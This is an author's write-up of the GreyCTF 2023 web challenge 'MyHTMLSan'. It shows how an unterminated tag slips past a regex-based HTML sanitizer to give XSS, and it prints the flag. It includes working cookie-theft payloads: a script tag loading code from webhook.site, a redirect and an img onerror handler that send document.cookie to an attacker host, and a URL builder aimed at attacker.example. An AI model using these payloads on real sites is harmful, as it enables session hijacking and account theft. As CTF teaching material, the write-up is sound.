GreyCTF 2023 Finals: MyHTMLSan

This is the author’s writeup for the challenge MyHTMLSan in the web category.

It describes the solution I intended when I made the challenge.

Challenge description #

LiveOverflow inspired me to host html files, I hope I made them safe enough.

Junhua

There was no source code for this challenge, only a link to the website.

My Notes #

This was meant to be an easy challenge.
The inspiration for the challenge came from LiveOverflow’s video on HTML Specification.
Source Code can be found here.
I could have locked it down further with a blacklist, or by configuring the headless browser not to follow redirects.

Notes to future self when setting up this challenge. #

Spend more time checking for unintended solutions.

The Website #

Figure: MyHTMLService main page

When we first visit the website, we are greeted with a simple page containing a form where a user can submit HTML code. We also see an embedded LiveOverflow video explaining the HTML specification.

After submitting our HTML code, we are greeted with a page that shows us the output of our HTML code (if any). There is also a Report to admin button that we can use to report this link.

Each submission is stored under a UUID so that users cannot guess the location of other submissions.

Looking at the question #

As the image above shows, plain text is rendered as is. Let us try some HTML tags.

After submitting <h1>test</h1>, we see the following output.

We can see from the above that the h1 tags were stripped.

To complete this challenge, we have to find an XSS vulnerability in the website and get the admin to visit our submission so that the payload runs in the admin’s browser.

Finding the XSS vulnerability #

Another hint that we have yet to look into is the LiveOverflow video embedded in the website. In the video, he talks about how he “discovered” an HTML sanitizer bypass that let him inject JavaScript into a website, but eventually found out that it was a quirk of the HTML specification.

He also mentions specifically that an opening < followed by a digit, i.e. [0-9], is not counted as the start of an HTML tag and will be rewritten as text.
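As a rough illustration of that rule, the sketch below mimics only the first decision the HTML tokenizer makes after it sees a < (the "tag open" state in the HTML Standard). The function name classifyAfterLessThan is made up for this example, and it is nowhere near a full parser.

```javascript
// Simplified sketch of the HTML tokenizer's "tag open" decision.
// classifyAfterLessThan is a hypothetical helper, not part of any library.
function classifyAfterLessThan(input) {
  if (input[0] !== "<") return "text";
  const next = input[1];
  if (next === undefined) return "text";          // lone "<" at end of input
  if (/[A-Za-z]/.test(next)) return "start tag";  // e.g. <h1
  if (next === "/") return "end tag (maybe)";     // e.g. </h1
  if (next === "!") return "comment/doctype";     // e.g. <!-- or <!DOCTYPE
  if (next === "?") return "bogus comment";       // e.g. <?xml
  return "text";                                  // e.g. <22 stays literal text
}

console.log(classifyAfterLessThan("<h1>"));      // start tag
console.log(classifyAfterLessThan("<22 foo>"));  // text
```

A sanitizer that disagrees with the browser about what counts as a tag is exactly the kind of mismatch the video is about.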

Let us try the example that he gave in the video, <22 foo="bar<h1>">test</22>.

We can see from the image that this too was stripped from the output.

Hmm… maybe there was something else in the video that hints at the answer for this question.

Towards the end of the video, he talks about how HTML cannot be parsed using regex. He then shows an example of a regex he found online that attempts to match HTML tags anyway.

Perhaps the sanitizer is made from regex.

Regex from the video #

The post that he mentioned in the video can be found here.

The main regex shown is <(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>. It is meant to match HTML tags, but it has a weakness that matters here:

It does not match a tag that is missing its closing > (e.g. <br instead of <br />).
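The behaviour seen so far can be reproduced locally. The sketch below assumes the server simply deletes every match of that regex; stripTags is a hypothetical stand-in, and the real sanitizer may differ in its details.

```javascript
// Regex quoted in the writeup; it only matches a tag that ends with ">".
const TAG_REGEX = /<(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>/g;

// Hypothetical sanitizer: assumes the server deletes every match.
function stripTags(html) {
  return html.replace(TAG_REGEX, "");
}

console.log(stripTags("<h1>test</h1>"));                // test
console.log(stripTags('<22 foo="bar<h1>">test</22>'));  // test
console.log(stripTags("<h1"));                          // <h1
```

The quoted attribute in the <22 payload is handled by the regex's quote branches, which is why that payload is removed as a whole, while the unterminated <h1 never matches and passes through untouched.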

Let us try it out on the website.

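For the above result, we submitted the payload <h1 without the closing >. As the rendered HTML shows, the h1 tag was not sanitized. The browser still treats it as a tag, because its parser keeps reading until it reaches the next > that appears later in the page.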

The solution #

With that, we can use different tags to inject our JavaScript payload. There are multiple solutions.

Script Payload #

<script src="https://github.com/Jh123x/payload/raw/main/alert.js"

With the payload above, the script tag was rendered on the page.

Figure: Chrome blocked the script

However, Chrome blocked the script from loading.

This is due to a Chrome feature called Cross-Origin Read Blocking (CORB). For more information, see the CORB link under Useful Links.

TLDR: Chrome refuses to load a script from another domain when the response is not served with a JavaScript content type such as text/javascript.
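One way to picture the check is the simplified sketch below. It follows the nosniff rule from the Fetch Standard: a script response sent with X-Content-Type-Options: nosniff is blocked unless its MIME type is a JavaScript MIME type. The helper name, the lowercase header object, and the example header values are assumptions for illustration; in particular, the GitHub headers shown are what we would expect for a raw file, not something captured from the challenge.

```javascript
// Subset of the JavaScript MIME types browsers accept for scripts.
const JS_MIME_TYPES = new Set([
  "text/javascript",
  "application/javascript",
  "application/x-javascript",
  "text/ecmascript",
  "application/ecmascript",
]);

// Hypothetical helper: would a <script src> response be refused?
// Assumes the simplified rule "nosniff + non-JavaScript type => blocked"
// and a headers object whose keys are already lowercase.
function scriptBlockedByNosniff(headers) {
  const nosniff =
    (headers["x-content-type-options"] || "").trim().toLowerCase() === "nosniff";
  const mime = (headers["content-type"] || "").split(";")[0].trim().toLowerCase();
  return nosniff && !JS_MIME_TYPES.has(mime);
}

// Assumed headers for a raw file on GitHub: refused.
console.log(scriptBlockedByNosniff({
  "content-type": "text/plain; charset=utf-8",
  "x-content-type-options": "nosniff",
}));

// Assumed headers for a response we configured ourselves: allowed.
console.log(scriptBlockedByNosniff({ "content-type": "text/javascript" }));
```

This is only a model of the decision, but it shows why serving the same file with a JavaScript content type makes the difference.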

Thus, to make it work, we have to host the script somewhere that lets us control the content type, using a tool like webhook.site.

Figure: Editing the webhook.site page content to be text/javascript with an alert script

Over here we can edit the payload that appears when someone visits our website.

<script src="https://webhook.site/7ee53c33-a346-45da-8183-99142b31efcd"

With the above payload, we should be able to load any JavaScript that we want.

Now that we can trigger an alert, we can change the script to a redirect that carries the cookie, and then report the page to the admin to get the flag.

document.location.href = "<your site here>?cookie=" + document.cookie;

When the admin’s browser follows the redirect, the request to our site carries the admin’s cookie, from which we retrieve the flag.
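Cookies can contain characters such as ;, = or spaces, so it may be safer to URL-encode the value before appending it to the redirect target. Below is a minimal sketch of that idea; the collector address attacker.example, the helper name buildExfilUrl, and the sample cookie string are all made up for illustration.

```javascript
// Hypothetical collector URL; replace it with an endpoint you control.
const COLLECTOR = "https://attacker.example/collect";

// Build the redirect target, URL-encoding the cookie string so that
// characters such as ";", "=" or spaces survive the trip.
function buildExfilUrl(base, cookie) {
  const url = new URL(base);
  url.searchParams.set("cookie", cookie);
  return url.toString();
}

// In the browser this would be used as:
// document.location.href = buildExfilUrl(COLLECTOR, document.cookie);
console.log(buildExfilUrl(COLLECTOR, "session=abc123; theme=dark"));
```

On the receiving side, decoding the cookie query parameter gives back the original cookie string unchanged.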

Img Payload #

An alternative is to use the img tag:

<img src="aa" onerror="document.location.href='<site here>?cookies='+document.cookie"

This will have the same effect as the script tag above (and is faster).

Flag #

Flag: grey{r3geX_1s_N0t_4_htm1_cee664daa169f7cdb53f87ab810ccb15}

Useful Links #

LiveOverflow’s video on HTML Specification to learn about parsing HTML with Regex
Webhook.Site to have an attacker-controlled server to receive cookies
CORB to learn about why Chrome blocks the script from loading
MyHtmlSan Source Code
StackOverflow post on why you should not use regex on HTML